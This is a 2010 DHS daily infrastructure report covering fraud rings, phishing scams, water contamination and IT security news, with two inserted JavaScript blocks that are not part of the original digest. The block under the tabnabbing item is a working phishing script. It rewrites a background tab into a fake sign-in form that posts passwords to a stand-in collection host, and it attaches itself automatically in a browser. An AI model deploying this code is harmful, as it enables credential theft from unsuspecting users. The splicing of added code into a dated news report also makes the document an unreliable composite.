Department of Homeland Security Daily Open Source Infrastructure Report

Wednesday, May 26, 2010

Complete DHS Daily Report for May 26, 2010

Daily Report

Top Stories

 Federal authorities allege that two cells of Bulgarian organized criminals defrauded Las Vegas and Phoenix area car dealers out of $1.6 million and stole at least $700,000 from bank ATMs around the valley, the Las Vegas Review-Journal reports. In all, 11 people were charged in three separate indictments unsealed last week in federal court after a two-year FBI investigation that involved the use of court-approved wiretaps. (See item 16 below in the Banking and Finance Sector)

 According to Before It’s News, about 105 million people — or more than one-third of the nation’s population — receive their drinking water from one of the 140,000 public water systems across the United States that rely on groundwater pumped from public wells. More than 20 percent of untreated water samples from 932 public wells across the nation contained at least one contaminant at levels of potential health concern, states a new study by the U.S. Geological Survey. (See item 37)

37. May 21, Before It’s News – (National) Wellwater contamination a health risk for more than one third of U.S. population say USGS scientists. What’s your poison? That question may be more appropriate when asking for a glass of water than bellying up to the bar with a friend. Maybe you would like a chemical cocktail of contaminants? About 105 million people — or more than one-third of the nation’s population — receive their drinking water from one of the 140,000 public water systems across the United States that rely on groundwater pumped from public wells. More than 20 percent of untreated water samples from 932 public wells across the nation contained at least one contaminant at levels of potential health concern, according to a new study by the U.S. Geological Survey. The USGS focused primarily on source (untreated) water collected from public wells before treatment or blending, rather than the finished (treated) drinking water that water utilities deliver to their customers. Findings showed that naturally occurring contaminants, such as radon and arsenic, accounted for about three-quarters of contaminant concentrations greater than human-health benchmarks in untreated source water. Naturally occurring contaminants are mostly derived from the natural geologic materials that make up the aquifers from which wellwater is withdrawn. Man-made contaminants were also found in untreated water sampled from the public wells, including herbicides, insecticides, solvents, disinfection by-products, nitrate, and gasoline chemicals. Man-made contaminants accounted for about one-quarter of contaminant concentrations greater than human-health benchmarks, but were detected in 64 percent of the samples, predominantly in samples from unconfined aquifers. Source:


Banking and Finance Sector

16. May 25, Las Vegas Review-Journal – (Arizona; Nevada) Las Vegas Investigation: Crime ring busted, FBI says. Federal authorities allege that two cells of Bulgarian organized criminals defrauded Las Vegas and Phoenix area car dealers out of $1.6 million and stole at least $700,000 from bank ATMs around the valley. In all, 11 people were charged in three separate indictments unsealed last week in federal court after a two-year FBI investigation that involved the use of court-approved wiretaps. The FBI declined to comment May 24 as agents continued to search for some of the defendants. At a hearing May 24, the assistant U.S. attorney said the FBI had obtained information from authorities in Bulgaria that one of the alleged ringleaders was an associate of organized crime figures in that country. The suspect, a U.S. citizen who lives in Las Vegas, was charged in all three indictments, including one that accuses him and his wife of unlawfully obtaining a 9 millimeter pistol during the criminal investigation. Another indictment charges the alleged ringleader and five other men with conspiracy, wire fraud and transportation of stolen property in a scheme to unlawfully acquire vehicles from car dealers and ship them coast to coast and to Eastern Europe. The ring would send in straw buyers claiming to be employed by phony companies at lucrative salaries in an effort to obtain financing for the vehicles, the indictment charges. In another indictment, the suspect and four other men are charged with trafficking in counterfeit access devices and aggravated identity theft in a scheme in spring 2009 to steal bank account numbers and PINs from customers. The ring captured the information with the help of a scanning device or a small camera secretly installed at an ATM where customers withdraw money, the indictment alleges. After obtaining the card data, ring members allegedly encoded it onto blank plastic cards with a magnetic stripe, allowing them to withdraw cash from ATMs with the cloned cards. In recent years, authorities in the United States have seen a rise in this kind of “skimming” scheme, particularly from organized crime groups out of Eastern Europe. Source:

17. May 25, Associated Press – (Wisconsin) ‘Tinfoil bandits’ arrested in Rock County. Rock County, Wisconsin authorities have arrested three people they say disabled a convenience store’s credit card system and then made multiple purchases. Rock County sheriff’s officials said the group came into Carl’s Shell in Newville nine times Monday evening and made repeated credit card purchases of cigarettes, beer, and soda. A clerk called police, and a state trooper later pulled over the group’s car. Two men and a woman, all in their 20s, were arrested. Investigators believe the group climbed onto the store’s roof and covered its satellite dishes with tinfoil, which kept the store’s credit card terminals from transmitting transactions for authorization, so the cards were never charged. Source:

18. May 25, Winston-Salem Journal Reporter – (National) Fidelity Bank issues warning about fake cashier’s checks. The Fidelity Bank, which has 15 branches in the Triad, said May 24 that it has notified the Federal Deposit Insurance Corp. that counterfeit cashier’s checks bearing its name are in circulation. The counterfeit items display the routing number 053103585, which is assigned to the bank. The items are markedly dissimilar to authentic checks. The words “cashier’s check” are shown inside of a box in the top-center area. A security feature statement appears below the border on both sides of the box. A security feature statement also appears across the bottom of the items. The phrase “authorized signature” is shown below the signature line in the lower-right corner. According to the bank, authentic cashier’s checks are gray. The words “cashier’s check” are in the top-center area with horizontal lines on both sides. A “notice to customers” statement appears inside of a box below the written amount line on the left side of the checks. Source:
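An added illustration of the practitioner's caveat in the warning above (this is not code from the report or from the bank): the routing number 053103585 carries a valid check digit, so a counterfeit that copies a real bank's number passes any routing-number checksum test, and screening has to rest on the layout cues the bank published. The check-digit scheme (weights 3, 7, 1 repeated, weighted sum a multiple of 10) is the standard ABA rule; the `screenCashiersCheck` function, its feature names and the two sample items are constructed for the example.

```javascript
// Added example (not code from the report or from Fidelity Bank).
// ABA routing transit numbers are nine digits; the weights 3,7,1 repeat over
// the digits and the weighted sum must be a multiple of 10.
function isValidRoutingNumber(rtn) {
  if (!/^\d{9}$/.test(rtn)) return false;
  const weights = [3, 7, 1, 3, 7, 1, 3, 7, 1];
  let sum = 0;
  for (let i = 0; i < 9; i++) sum += Number(rtn[i]) * weights[i];
  return sum % 10 === 0;
}

// Constructed screening rule for a presented cashier's check. The checksum only
// catches transcription and OCR errors; a counterfeit that copies the bank's
// real routing number (as in the warning above) passes it, so the decision
// rests on the layout cues the bank published. "features" is an assumed
// description of the item, not output from any real scanner.
function screenCashiersCheck(features) {
  const reasons = [];
  if (!isValidRoutingNumber(features.routingNumber)) {
    reasons.push('routing number fails check digit');
  }
  if (features.titleInBox) {
    reasons.push('"cashier\'s check" shown in a box; authentic items use horizontal lines');
  }
  if (features.authorizedSignatureCaption) {
    reasons.push('"authorized signature" caption under the signature line');
  }
  if (!features.noticeToCustomersBox) {
    reasons.push('no "notice to customers" box below the written amount line');
  }
  return { verdict: reasons.length ? 'hold for review' : 'no layout anomalies', reasons };
}

// Constructed samples that follow the descriptions in the warning.
const COUNTERFEIT_SAMPLE = {
  routingNumber: '053103585',      // the bank's real routing number
  titleInBox: true,
  authorizedSignatureCaption: true,
  noticeToCustomersBox: false,
};
const AUTHENTIC_SAMPLE = {
  routingNumber: '053103585',
  titleInBox: false,
  authorizedSignatureCaption: false,
  noticeToCustomersBox: true,
};

console.log(screenCashiersCheck(COUNTERFEIT_SAMPLE));
console.log(screenCashiersCheck(AUTHENTIC_SAMPLE));
```

The counterfeit sample is held with three layout reasons and none for the routing number; that is the point of the exercise, since a teller or a deposit-capture system that stops at "routing number is valid" will accept these items.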

19. May 24, Rapid City Journal – (South Dakota) Bank alerts members to phishing scam. Sentinel Federal Credit Union is alerting the Rapid City, South Dakota community to a telephone scam that has targeted the area over the past several days. The scam is a phishing attempt, carried out by phone (a variant often called vishing), that seeks to steal personal information. Recipients get fraudulent automated calls stating that their Sentinel Federal Credit Union ATM or debit card has been compromised; the message then instructs them to key in their card number to reactivate the card. Sentinel Federal Credit Union said it will never contact its members this way. Source:

For another story, see item 49 below in the Information Technology Sector

Information Technology

49. May 25, The New New Internet – (International) Researcher finds new type of phishing attack. A researcher has found a new method for carrying out phishing attacks “that takes advantage of the way that browsers handle tabbed browsing and enables an attacker to use a script running in one tab to completely change the content in another tab,” according to ThreatPost. The attack, discovered by a researcher for Mozilla, relies on the user having an attacker-controlled page open in one tab and then switching to other tabs. Once the tab is in the background, a script on the page detects that it has lost focus and rewrites its own title, favicon and content to imitate a chosen login page; a user who returns to the tab later sees what looks like a site they trust and may enter credentials into it, even though the address bar still shows the attacker’s URL. The researcher demonstrates it on his own Web site, where the page alters itself to appear as the log-in page for Google. The same approach could be used against banking Web sites and similar targets to steal login and account information. Source:
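The technique described above, as an added example that is not the researcher’s demo and not code from the page: the page keeps a small state machine that waits until the tab has been hidden for an idle period, then repaints its title, favicon and body into a look-alike login form. The decision logic is kept free of the DOM so it can be exercised offline; the target name “Example Accounts”, the collection URL attacker.example.test and the 10-second threshold are assumptions.

```javascript
// Added example: a minimal model of the tabnabbing technique. Not code from
// the page or the researcher's demo. The look-alike content, the collection
// URL (attacker.example.test) and the idle threshold are assumptions.

const IDLE_MS = 10 * 1000;

// What the page repaints itself into once the user has looked away. The one
// thing a script cannot change is the address bar, which is why checking it is
// the reliable defence for a user.
const LOOKALIKE = {
  title: 'Sign in - Example Accounts',                   // assumed target brand
  favicon: 'https://accounts.example.test/favicon.ico',  // assumed
  html:
    '<form action="https://attacker.example.test/collect" method="post">' +
    'Email <input name="u"> Password <input type="password" name="p">' +
    '<button>Sign in</button></form>',
};

// DOM-free core so the decision logic can be reasoned about and tested offline.
class TabnabbingController {
  constructor(render, idleMs = IDLE_MS) {
    this.render = render;      // repaints title, favicon and body
    this.idleMs = idleMs;
    this.hiddenSince = null;   // timestamp when the tab went to the background
    this.swapped = false;
  }
  onHidden(now) {
    if (this.hiddenSince === null) this.hiddenSince = now;
  }
  onVisible() {
    // The user is back. A swapped page stays swapped: the tab they remember as
    // harmless now shows a login form.
    this.hiddenSince = null;
    return this.swapped;
  }
  tick(now) {
    // Polled once a second; swap only after the tab has been hidden long enough
    // for the user to have lost track of what it showed.
    if (!this.swapped && this.hiddenSince !== null &&
        now - this.hiddenSince >= this.idleMs) {
      this.swapped = true;
      this.render(LOOKALIKE);
    }
    return this.swapped;
  }
}

// Browser wiring via the Page Visibility API; skipped when there is no DOM.
function attach(doc, win) {
  const ctl = new TabnabbingController((page) => {
    doc.title = page.title;
    let link = doc.querySelector('link[rel~="icon"]');
    if (!link) {
      link = doc.createElement('link');
      link.rel = 'icon';
      doc.head.appendChild(link);
    }
    link.href = page.favicon;
    doc.body.innerHTML = page.html;
  });
  doc.addEventListener('visibilitychange', () => {
    if (doc.hidden) ctl.onHidden(Date.now());
    else ctl.onVisible();
  });
  win.setInterval(() => ctl.tick(Date.now()), 1000);
  return ctl;
}

if (typeof document !== 'undefined' && typeof window !== 'undefined') {
  attach(document, window);
}
```

Two things follow for defenders: the address bar is the only part of the tab the script cannot rewrite, so a user who re-reads it before typing is not fooled, and a password manager that fills credentials only on the matching origin will stay silent on the look-alike form.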

50. May 25, Infoworld – (International) Security forecast: High chance of ‘shadow’ clouds. If people think “cloud networks” and “cloud services” are just buzzwords or another set of technologies destined for extinction, think again: The cloud is here to stay. In the future, companies will subscribe to one or more cloud products — if they have not already. A friend of mine asked if we would prevent unauthorized cloud products, which he called “shadow clouds,” from starting to appear on our networks. His question is not as strange as it might sound. Every new, big technology leap has also brought in a deluge of unmanaged instances — think instant messaging or social network sites. Shadow clouds would, in fact, be a more significant threat to your company’s confidential information than IM or social networking blogs. All computer services and presences need to be managed to ensure compliant security, content, and messaging, but with a shadow cloud, a user is at greater risk because their company’s confidential data is more likely to be hosted on the cloud provider’s systems. Ridiculous or unusual though it may sound, IT security should start preparing now for the emergence of shadow clouds. Source:

51. May 25, SC Magazine – (International) Warnings made of vulnerability in the 3Com Intelligent Management Centre that could result in lack of consumer control. Organizations have been warned that they could lose control of their networks due to a vulnerability in the 3Com Intelligent Management Center (IMC). Penetration testing company ProCheckUp claimed that users of IMC are at risk of losing control of the application, which is designed to manage, monitor and control enterprise networks. It reported that it was able to gain control of IMC without providing any passwords or other authentication information, by combining directory traversal, retrieval of the SQL administrator account password, and cross-site scripting attacks. A security consultant at ProCheckUp claimed that this security hole could allow an attacker to alter switches and routers managed by the IMC, and potentially switch off a whole organization’s network and Internet facilities. 3Com has been informed and has released a patched version that addresses the issues. Source:

52. May 25, The Register – (International) Looking for code work? Write fake anti-virus scripts. A scareware purveyor has brazenly advertised for recruits on a mainstream job market Web site. The ad offers work for a coder prepared to turn his hand to the creation of fake anti-virus Web site redirection scripts. However, prospective applicants are warned not to expect a big payday — the budget for the whole project is between $30 and $250. On the plus side the prospective employer, redlinecl, has 100 percent positive feedback from previous coding lackeys. One said: “Nice buyer, hope can work for him again in the future.” Of course when the job involves tricking the unsuspecting into visiting scareware portals in order to flog software of little or no utility it is probably wise to take these glowing reviews with a pinch of salt. The ad, posted May 24, was spotted by a security researcher at Websense, who notes that the same chap was previously involved in fake PayPal pages, spam campaigns and other forms of malfeasance. The market for scareware is booming. Shysters involved in the business are increasingly adopting the business structures of mainstream security firms - even to the point of running call centers designed to persuade people not to apply for refunds, and recruitment programs. Source:

53. May 24, DarkReading – (International) Apple Safari ‘carpet bomb’ flaw remains unfixed two years later. Apple fixed the so-called “carpet bomb” vulnerability in its Safari browser for Windows after Microsoft issued a security advisory about it in July 2008, but to date the very same flaw in Safari for OS X is still unpatched. The security researcher who alerted Apple to the flaw in May 2008 said the threat of an attacker exploiting this bug is alive and well today, especially with the growth in popularity of Safari and OS X. He said in 2008 Apple told him it did not consider the issue a security vulnerability but more of a design issue, and that it did not have plans to fix it anytime soon. The researcher said the vulnerability could let an attacker download malicious binaries and data files into the browser’s downloads folder without the user knowing, because Safari does not ask the user whether he wants to save the file on his machine, as most other browsers do. So when a user visits a malicious Web site, Safari allows the site to download files without prompting the user. The main threat the flaw poses is a denial-of-service attack on the victim’s machine. The carpet bomb DoS attack would wipe out a session and “whatever you were working on would be gone,” the researcher said. Source:

54. May 24, Infoworld – (International) Four-year-old rootkit tops the charts of PC threats. Microsoft just released its May Threat Report, and the results should give one pause. With nearly 2 million infected systems cleaned, the nefarious Alureon rootkit came out on top. Since it first appeared in 2006, Alureon (known in various incarnations as TDSS, Zlob, or DNSChanger) has morphed into a mean money-making marvel: a varied collection of Trojans most famous for their ability to invisibly take control of a PC’s interactions with the outside world. Alureon frequently runs as a rootkit, snatches information sent and received over the Internet, and may install a backdoor that allows Alureon’s masters to update a computer with the software of their choice. As with most malware, people inadvertently install Alureon when they think they are installing something else. Microsoft’s April Threat Report explains that a typical Alureon installer asks to be elevated to administrator status. Source:

55. May 24, CSO – (International) Business continuity, not data breaches, among top concerns for tech firms. Data security and breach prevention ranks low as a risk factor for most big technology companies, according to new research that identifies the most widespread concerns among the 100 largest U.S. public technology companies. The research, released by BDO, a professional services firm, examines the risk factors listed in the fiscal year 2009 10-K SEC filings of the companies; the factors were analyzed and ranked by how frequently they were cited. Among security risks, natural disasters, wars, conflicts and terrorist attacks were cited by 55 percent of the companies and ranked 16th on the list, well above breaches of technology security, privacy and theft, which 44 percent of the companies cited, placing it 23rd. The leader of the Technology Practice at BDO said he thought business continuity was driving worries about risks like natural disasters and conflicts. Accounting, internal controls and Sarbanes-Oxley compliance is the 18th most frequently cited risk factor this year, according to the list. Source:

Communications Sector

Nothing to report